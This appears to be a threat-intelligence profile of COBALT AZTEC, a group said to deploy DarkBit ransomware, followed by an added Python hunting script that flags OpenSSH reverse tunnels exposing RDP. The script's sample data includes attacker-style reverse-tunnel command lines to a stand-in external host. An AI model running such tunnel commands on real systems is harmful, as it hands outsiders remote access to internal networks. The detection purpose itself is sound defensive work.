COBALT AZTEC
SUMMARY
COBALT AZTEC is an Iranian state-sponsored threat group that operates and distributes DarkBit ransomware in destructive cyber attacks. Because the evidence initially available pointed to financial motivation, CTU researchers first assigned the group the 'GOLD' prefix, which denotes cybercriminal intent. Subsequent analysis, however, indicated Iranian state sponsorship and a primary motivation of disrupting Iran's strategic adversaries. While COBALT AZTEC may continue to pursue financial gain as a secondary motivation, it does not meet CTU criteria for designation as a financially motivated cybercriminal group.
COBALT AZTEC has been active since at least December 2022, when the group established a victim payment portal on the Tor network and targeted its first known victim. COBALT AZTEC exfiltrates data from targeted networks before deploying DarkBit, a Golang-based ransomware family built for both Windows and VMware ESXi that encrypts files using a combination of the RSA and AES algorithms. The encryption process leaves a ransom note with instructions on how to contact the threat actors and begin negotiating payment for the decryption of files. Although COBALT AZTEC engages victims through emails threatening to publish the stolen data if the ransom is not paid, financial motivation is likely secondary to the main aims of causing disruption and reputational damage.
In early February 2023, the group changed the imagery on its Tor site to include the phrase "Against any kind of racism, fascism, and apartheid." and established a Twitter account and Telegram channel that expressed similar sentiments. This suggested hacktivist intent and coincided with the targeting of an entity in Israel that the country's National Cyber Directorate later linked to COBALT ULSTER (aka MuddyWater). COBALT AZTEC has offered stolen data for sale on its dedicated Telegram channel, but it is not clear whether this is a genuine sales effort or simply a means of showcasing the data taken. As of March 2023, the limited known DarkBit victimology suggests targeting of organizations in countries that have signed the Abraham Accords.
COBALT AZTEC may rely on other Iranian threat groups to gain entry into targeted organizations, or may buy access from initial access brokers (IABs). Persistent access to the environment is maintained through OpenSSH-facilitated tunnels back to attacker infrastructure hosted at a commercial cloud computing provider. These tunnels provide RDP access into the victim's environment, which is then used for lateral movement.
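The OpenSSH tunnelling described above leaves a footprint in process-creation telemetry that defenders can hunt for. The following is an added example, not code from the report or from CTU. It assumes the tunnel takes the common reverse-forward form (`ssh -R` or `-o RemoteForward=`), which the report does not state explicitly, and it runs over constructed sample command lines: the internal domain suffix `corp.example`, the hostnames and the 203.0.113.0/24 addresses are hypothetical. It flags any reverse forward whose target port is 3389 (RDP reachable through the tunnel) and, more weakly, any reverse forward whose SSH destination lies outside the assumed internal domain.

```python
"""Added example: hunting for OpenSSH reverse tunnels that expose RDP.

Parses ssh(1) command lines from process-creation records (constructed
samples below, not data from the report) and flags -R / RemoteForward
specifications whose target port is 3389, plus reverse tunnels whose
SSH destination is outside the assumed internal domain.
"""
import re
import shlex
from dataclasses import dataclass
from typing import Optional

RDP_PORT = 3389
# Assumption for this example: hosts under these suffixes are internal.
INTERNAL_SUFFIXES = (".corp.example",)
# OpenSSH client flags that take an argument (per ssh(1)); needed so that
# e.g. "-i <keyfile>" is not mistaken for the destination host.
ARG_OPTS = set("BbcDEeFIiJLlmOopQRSWw")


@dataclass
class Finding:
    reason: str                   # "rdp_exposed" or "reverse_tunnel_external"
    remote_host: str              # SSH server the tunnel is built to
    exposed_port: Optional[int]   # port opened on the remote (attacker) side
    target: Optional[str]         # host:port reachable through that port
    cmdline: str


def _to_int(s):
    return int(s) if s.isdigit() else None


def _parse_forward(spec):
    """Parse a -R spec: [bind:]port:host:hostport, or [bind:]port (SOCKS)."""
    parts = spec.split(":")
    if len(parts) == 4:
        bind, port, host, hostport = parts
    elif len(parts) == 3:
        bind, (port, host, hostport) = "localhost", parts
    else:  # dynamic (SOCKS) forward: nothing specific is exposed
        return {"bind": None, "port": _to_int(parts[-1]), "host": None, "hostport": None}
    return {"bind": bind, "port": _to_int(port), "host": host, "hostport": _to_int(hostport)}


def parse_ssh_command(cmdline):
    """Return {'dest': host, 'reverse': [forward dicts]} for an ssh command
    line, or None if the process is not the OpenSSH client."""
    # posix=False keeps Windows backslashes literal and leaves quotes on tokens.
    argv = [t.strip('"') for t in shlex.split(cmdline, posix=False)]
    if not argv or re.split(r"[\\/]", argv[0])[-1].lower() not in ("ssh", "ssh.exe"):
        return None
    forwards, dest, i = [], None, 1
    while i < len(argv):
        tok = argv[i]
        if tok.startswith("-") and len(tok) > 1:
            opts = tok[1:]
            for j, flag in enumerate(opts):
                if flag not in ARG_OPTS:
                    continue  # boolean flag, possibly bundled as in -fNR
                val = opts[j + 1:]  # inline argument form, e.g. -R3389:...
                if not val and i + 1 < len(argv):
                    i += 1
                    val = argv[i]
                if flag == "R":
                    forwards.append(val)
                elif flag == "o" and val.lower().startswith("remoteforward="):
                    forwards.append(val.split("=", 1)[1])
                break  # the rest of the token was the argument
        elif dest is None:
            dest = tok
        else:
            break  # remaining tokens are the remote command
        i += 1
    host = None
    if dest:  # strip ssh:// scheme, user@ prefix and :port suffix
        host = dest.removeprefix("ssh://").rsplit("@", 1)[-1].split(":")[0]
    return {"dest": host, "reverse": [_parse_forward(f) for f in forwards]}


def triage(records):
    """Apply both detections to process records (dicts with 'cmdline')."""
    findings = []
    for rec in records:
        parsed = parse_ssh_command(rec["cmdline"])
        if not parsed or not parsed["reverse"]:
            continue
        host = parsed["dest"] or ""
        external = not host.endswith(INTERNAL_SUFFIXES)
        for fwd in parsed["reverse"]:
            target = f'{fwd["host"]}:{fwd["hostport"]}' if fwd["host"] else None
            if fwd["hostport"] == RDP_PORT:
                reason = "rdp_exposed"
            elif external:
                reason = "reverse_tunnel_external"
            else:
                continue
            findings.append(Finding(reason, host, fwd["port"], target, rec["cmdline"]))
    return findings


# Constructed sample telemetry (hypothetical; 203.0.113.0/24 is a documentation range).
SAMPLE_RECORDS = [
    {"cmdline": r"C:\Windows\System32\OpenSSH\ssh.exe -N -R 3389:127.0.0.1:3389 -i C:\Users\Public\k svc@203.0.113.10"},
    {"cmdline": "ssh -o RemoteForward=0.0.0.0:13389:localhost:3389 -o ServerAliveInterval=30 ops@203.0.113.10"},
    {"cmdline": "ssh -L 8080:intranet:80 admin@jump.corp.example"},
    {"cmdline": "ssh -fNR 2222:localhost:22 backup@203.0.113.10"},
    {"cmdline": "ssh -R 1080 proxy@relay.corp.example"},
    {"cmdline": r"notepad.exe C:\notes.txt"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_RECORDS):
        print(f"{f.reason:24} -> {f.remote_host} port {f.exposed_port} reaches {f.target}")
```

On the constructed records the first two command lines are reported as RDP exposed through a reverse tunnel (the second via a non-default remote port, which is why the target port rather than the exposed port drives the rule), the `-fNR 2222` line is reported only as a reverse tunnel to an external host, and the local forward, the SOCKS forward to an internal relay, and the non-ssh process produce nothing. In production the same parser would be fed from Sysmon Event ID 1 or Windows Security Event 4688 command lines, and the destination host would be checked against allow-listed bastions rather than a domain suffix.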